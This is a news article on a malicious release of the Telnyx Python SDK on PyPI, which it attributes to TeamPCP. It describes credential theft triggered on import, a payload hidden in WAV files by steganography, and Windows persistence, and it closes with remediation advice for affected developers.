A new software supply chain attack has targeted developers after threat actors compromised the Telnyx Python SDK on PyPI. The malicious packages were designed to steal credentials from systems running Windows, macOS, and Linux, highlighting the growing risks within open-source ecosystems.
The attack demonstrates how trusted developer libraries can be weaponized to silently compromise environments with minimal user interaction.
Malicious Telnyx Versions Published to PyPI
The compromised versions of the Telnyx Python SDK were uploaded to the Python Package Index without corresponding changes in the official repository. The malicious releases targeted developers by embedding credential-stealing functionality directly into the package.
Security researchers attributed the campaign to TeamPCP, which has recently been linked to multiple supply chain attacks. The group appears to be systematically targeting widely used open-source libraries to maximize impact.
The attack was particularly dangerous because the payload executed automatically. Simply importing the package in a Python project triggered the malicious code, requiring no additional user interaction.
Automatic Credential Theft on Import
The malicious logic was injected into a core module of the SDK. Once the package was imported, the payload executed immediately and began collecting sensitive information from the host system.
The malware transmitted stolen credentials to an attacker-controlled server using strong encryption, including AES-256-CBC and RSA-4096. This encryption chain made network-level inspection and detection significantly more difficult.
Windows systems faced an additional risk, as the malware established persistence by installing a disguised executable that launched automatically at system startup.
WAV Steganography Used to Hide Malware
One of the most notable aspects of this attack was the use of steganography to conceal the payload inside WAV audio files. Instead of embedding the credential harvester directly in the source code, the malicious package downloaded a file that appeared to be legitimate audio content.
The hidden payload was extracted from raw audio frames, decoded, and decrypted at runtime. This technique allowed the malware to bypass file-type filtering and evade static code analysis, since the malicious logic was not visible in the package itself.
By splitting the code across multiple sections and retrieving the payload dynamically, the attackers significantly reduced the likelihood of detection during routine code reviews.
Cross-Platform Infection and Persistence
The attack targeted all major operating systems, delivering different payloads depending on the environment. Once executed, the malware could:
- Collect credentials from developer systems
- Establish persistence on Windows hosts
- Download additional payloads
- Communicate with command-and-control infrastructure
- Maintain long-term access to compromised environments
The cross-platform design increased the risk to development teams using shared tooling across Windows, macOS, and Linux.
Security Recommendations for Developers and Organizations
Organizations that installed the affected versions should treat their systems as compromised and take immediate action:
- Downgrade to the last known clean version of the package
- Rotate credentials and API keys
- Rebuild affected systems from trusted images
- Monitor for unusual outbound connections
- Check startup folders for suspicious executables
- Review package dependencies and lockfiles
- Audit developer environments and CI/CD pipelines
Teams should also watch for suspicious WAV file downloads from non-media sources and unexpected HTTP traffic carrying unusual headers.
Supply Chain Attacks Target Developer Ecosystems
This incident highlights how attackers are increasingly focusing on developer tooling and open-source libraries. By compromising trusted packages, threat actors can gain access to developer machines, build pipelines, and production systems simultaneously.
The use of steganography, automatic execution, and cross-platform payloads demonstrates the growing sophistication of supply chain attacks. Organizations must strengthen dependency monitoring, enforce version pinning, and validate package integrity to reduce exposure.
As open-source adoption continues to grow, securing software dependencies has become a critical component of modern cybersecurity strategy.
